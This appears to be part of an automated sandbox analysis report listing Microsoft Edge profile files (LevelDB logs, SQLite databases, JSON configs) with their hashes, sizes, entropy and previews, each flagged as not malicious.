Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.213742042124163
Encrypted:	false
SSDEEP:	6:iOrvkJQL+q2PFi23oH+TcwtnG2tMsIFUtJvkAYGF3AGKWZmwPvkMmAQLVkwOFi25:7WQ+vdZYebn9GFUtdrF3AGKW/j3QV5wL
MD5:	AF9E7BBD69256913D030814726B5AD9F
SHA1:	378E0E02D5D77EA2779FFA60425E601D32647881
SHA-256:	4988BE7435E9DB56A9E7848DCC39C8710BCC6E8E6983247092315578FB27F27B
SHA-512:	58DF7ED0FC4D52F0C4654450DBB309AE58C587BA5224C0399FFDA335B35D8456254779B8971B0105D6B1793D9110B38988ECFFACD17ADE3AD57145B1F40EEB1F
Malicious:	false
Preview:	2025/01/09-08:56:06.228 3ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:56:06.259 3ec Recovering log #3.2025/01/09-08:56:06.296 3ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	341
Entropy (8bit):	5.213742042124163
Encrypted:	false
SSDEEP:	6:iOrvkJQL+q2PFi23oH+TcwtnG2tMsIFUtJvkAYGF3AGKWZmwPvkMmAQLVkwOFi25:7WQ+vdZYebn9GFUtdrF3AGKW/j3QV5wL
MD5:	AF9E7BBD69256913D030814726B5AD9F
SHA1:	378E0E02D5D77EA2779FFA60425E601D32647881
SHA-256:	4988BE7435E9DB56A9E7848DCC39C8710BCC6E8E6983247092315578FB27F27B
SHA-512:	58DF7ED0FC4D52F0C4654450DBB309AE58C587BA5224C0399FFDA335B35D8456254779B8971B0105D6B1793D9110B38988ECFFACD17ADE3AD57145B1F40EEB1F
Malicious:	false
Preview:	2025/01/09-08:56:06.228 3ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:56:06.259 3ec Recovering log #3.2025/01/09-08:56:06.296 3ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.61423662695982
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+jOeXupkJeX8MmL:TO8D4jJ/6Up+VCE
MD5:	5D45DC2B4A789E08FA92FEF554017ADC
SHA1:	603D32E740A7A638503A6DFD76AD496C2815FCD5
SHA-256:	F35F197991BCF7429FABA3AA7C65467385B04CA373FE5368927DC15341641611
SHA-512:	F6EA4311EF7BD98E8687EC0F6D3AE4B4FC28DC2C89A251FBEED79BC2A84D754A40E4994ED67FAF77C2C90A9C27CDA133593FF8108A8291961DE908F64E7338A4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354170187417239
Encrypted:	false
SSDEEP:	6144:OA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:OFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	2FE7DDEF1162B1184F149ABA80ECFA41
SHA1:	3A10C77D0CEA232114AB5F894197C1443AB735C2
SHA-256:	600F4C554ECC5E8D1EF7164601FA7B755B021BD60AB656BB7C1E3A5421389D0C
SHA-512:	5ADD457938E446688D7FFFD25374E3F033BA36CB75DDFD5E75199B83F899723189BE8ACB225B41EBCF3E416641070049CB715CF0B305B8F7423B9FA7C6926B47
Malicious:	false
Preview:	...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2...13380904574796966..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.236100119753619
Encrypted:	false
SSDEEP:	6:iOrvSbB1Fi23oH+Tcwtk2WwnvB2KLl5vD3+q2PFi23oH+Tcwtk2WwnvIFUv:76BZYebkxwnvFLjOvdZYebkxwnQFUv
MD5:	7EC4E60BD01795BE5FBDBB93A30360CE
SHA1:	2FE8339F8719AFD996793A9E74C7D39C036C169E
SHA-256:	97A4B2DC5402B54BCD0DAD7D4A5AE10D43243EA49C9C51C1492BBB2776141CC9
SHA-512:	C850AE5FB5D5040FB0B90F4437CB82C7A8577CF13F098CECDBBDF8FD44AAB2A60AE067747D8E84935FC58E4CE4B78AA65D094ED4272F302C864EB174A81A2A93
Malicious:	false
Preview:	2025/01/09-08:56:13.404 f28 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:56:13.676 f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.3246213637632325
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ra:C1gAg1zfvC
MD5:	FFEDF9D3C8BD15D9043BD9CAFC4B1A89
SHA1:	6F0619F384F311F2D89D7BBFEFB83F14CB2EF202
SHA-256:	30D7435EAC1A89F5C20AFCB4235FC98D72A60DD1734BDC45A3CB643E6A64A979
SHA-512:	8D8555FD3383616D2DAF4ABDC41DBAFFDC4D9A5B67AF8FA920E99C444658F01AB268BE653AD3CBF182301DEAE2BC9C8BF4599B3224B892445497D4706D6E5860
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.230751101259804
Encrypted:	false
SSDEEP:	6:iOrvkUaq2PFi23oH+Tcwt8aPrqIFUtJvkUArZmwPvkUwkwOFi23oH+Tcwt8amLJ:7ZavdZYebL3FUt7g/9w5wZYebQJ
MD5:	A55CB54C639C55F20C8F3AEC02848EC4
SHA1:	E4EB11ACD9A11F132232FEE41C6C1ACD4AD41449
SHA-256:	542C52A6386F165A7B257F270436C7049B3B26CDD9F3CF4DD80460E4A453155D
SHA-512:	F6A74B263ED591F3CE8A585111F9DD0FF505077A95C290C3BC0F6808E612EB8247CECA12BF5AD2580C17F51292089F4DCD85BA20DECCDB594C489CEC85F77CAB
Malicious:	false
Preview:	2025/01/09-08:56:06.178 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:56:06.179 1b04 Recovering log #3.2025/01/09-08:56:06.180 1b04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.230751101259804
Encrypted:	false
SSDEEP:	6:iOrvkUaq2PFi23oH+Tcwt8aPrqIFUtJvkUArZmwPvkUwkwOFi23oH+Tcwt8amLJ:7ZavdZYebL3FUt7g/9w5wZYebQJ
MD5:	A55CB54C639C55F20C8F3AEC02848EC4
SHA1:	E4EB11ACD9A11F132232FEE41C6C1ACD4AD41449
SHA-256:	542C52A6386F165A7B257F270436C7049B3B26CDD9F3CF4DD80460E4A453155D
SHA-512:	F6A74B263ED591F3CE8A585111F9DD0FF505077A95C290C3BC0F6808E612EB8247CECA12BF5AD2580C17F51292089F4DCD85BA20DECCDB594C489CEC85F77CAB
Malicious:	false
Preview:	2025/01/09-08:56:06.178 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:56:06.179 1b04 Recovering log #3.2025/01/09-08:56:06.180 1b04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.22158945718215
Encrypted:	false
SSDEEP:	6:iOrvkXq2PFi23oH+Tcwt865IFUtJvkUULZmwPvkUUBkwOFi23oH+Tcwt86+ULJ:7kvdZYeb/WFUtVUL/zUB5wZYeb/+SJ
MD5:	D34322B430D92E1EA698A808813BC4C9
SHA1:	13BC5A7904DF2634318AD7EB8EB26F69E5EB76C6
SHA-256:	1FA72A4612FB8E2BE9A5496FD8308167601C5FF7D988950DB9FBF0562BAB922E
SHA-512:	E08264E24504B963DBB01ACFBA806BA9CBA87B24475F48166D9C9D8C6738440321F602C5307C8E6C8F14993C32850365AC50A68BBC5DD44C2B9C4835CA8B879D
Malicious:	false
Preview:	2025/01/09-08:56:06.228 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:56:06.229 1b04 Recovering log #3.2025/01/09-08:56:06.229 1b04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.22158945718215
Encrypted:	false
SSDEEP:	6:iOrvkXq2PFi23oH+Tcwt865IFUtJvkUULZmwPvkUUBkwOFi23oH+Tcwt86+ULJ:7kvdZYeb/WFUtVUL/zUB5wZYeb/+SJ
MD5:	D34322B430D92E1EA698A808813BC4C9
SHA1:	13BC5A7904DF2634318AD7EB8EB26F69E5EB76C6
SHA-256:	1FA72A4612FB8E2BE9A5496FD8308167601C5FF7D988950DB9FBF0562BAB922E
SHA-512:	E08264E24504B963DBB01ACFBA806BA9CBA87B24475F48166D9C9D8C6738440321F602C5307C8E6C8F14993C32850365AC50A68BBC5DD44C2B9C4835CA8B879D
Malicious:	false
Preview:	2025/01/09-08:56:06.228 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:56:06.229 1b04 Recovering log #3.2025/01/09-08:56:06.229 1b04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.227160525657727
Encrypted:	false
SSDEEP:	6:iOrvkL+q2PFi23oH+Tcwt8NIFUtJvyKWZmwPvS+LVkwOFi23oH+Tcwt8+eLJ:7AL+vdZYebpFUt7W/9LV5wZYebqJ
MD5:	A5CE6CF44103844A1D0DE9792F46C825
SHA1:	E7BA9290ACB27A7D1BEA293D7B98983C39B3AB26
SHA-256:	6C88BBC1BED9E64A8406F9A4DCEA89F7B625C052E74B01EF40C01FD1AB19D4DF
SHA-512:	14D89C749829A99513A29081865A65751C4DD688383D20729349276791B90311D44423ED3B6DA76531EEEFDEA45A432F4AB0FC70D55826EB60BC26D0A197FF6A
Malicious:	false
Preview:	2025/01/09-08:56:07.186 b5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:56:07.186 b5c Recovering log #3.2025/01/09-08:56:07.187 b5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.227160525657727
Encrypted:	false
SSDEEP:	6:iOrvkL+q2PFi23oH+Tcwt8NIFUtJvyKWZmwPvS+LVkwOFi23oH+Tcwt8+eLJ:7AL+vdZYebpFUt7W/9LV5wZYebqJ
MD5:	A5CE6CF44103844A1D0DE9792F46C825
SHA1:	E7BA9290ACB27A7D1BEA293D7B98983C39B3AB26
SHA-256:	6C88BBC1BED9E64A8406F9A4DCEA89F7B625C052E74B01EF40C01FD1AB19D4DF
SHA-512:	14D89C749829A99513A29081865A65751C4DD688383D20729349276791B90311D44423ED3B6DA76531EEEFDEA45A432F4AB0FC70D55826EB60BC26D0A197FF6A
Malicious:	false
Preview:	2025/01/09-08:56:07.186 b5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:56:07.186 b5c Recovering log #3.2025/01/09-08:56:07.187 b5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21838546206064957
Encrypted:	false
SSDEEP:	3:DdtFlljq7A/mhWJFuQ3yy7IOWUF/ludweytllrE9SFcTp4AGbNCV9RUI8:y75fOvQd0Xi99pEY2
MD5:	E21CB6D15B0331D93745AA2D974BEE1D
SHA1:	DC0139E9CA626194B4E18D1327B659779133EDB8
SHA-256:	578374AF3DED481323BB6325E8884B5AFBAEC1DCF3379C216B4603D6220D1695
SHA-512:	9886A985E82568C58B84D82FCF8A27D9A6968849DA91518CD038C4FCA77BC426078BCCBAF9B8810D09862D8643B5F3F6DC200390E14A280551CA1B00DF9F4569
Malicious:	false
Preview:	............XBlN...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6477190967619846
Encrypted:	false
SSDEEP:	384:aj9P0vP/Kbtfjl+QkQerUc3773pL9hCgam6ItRKToaAu:adkP/yl+e2X37Pv9RKcC
MD5:	930FAC8E7139A1694202F338563F0A9B
SHA1:	A4DCC8F40778D6D083E724043E79AFDB4043A413
SHA-256:	2EA5064F5F4587B4D791014CFF857AF08709D38A9C1697A7456519062551CD7C
SHA-512:	183F07F4A3F86A6243829D7E3A8418F591F92A8706AE72B7330EB2FEECC2002F04A7D1D279BE84A8A83936C557BA161B3BFCF7DDD19852D7BD4A999F0903E4AD
Malicious:	false
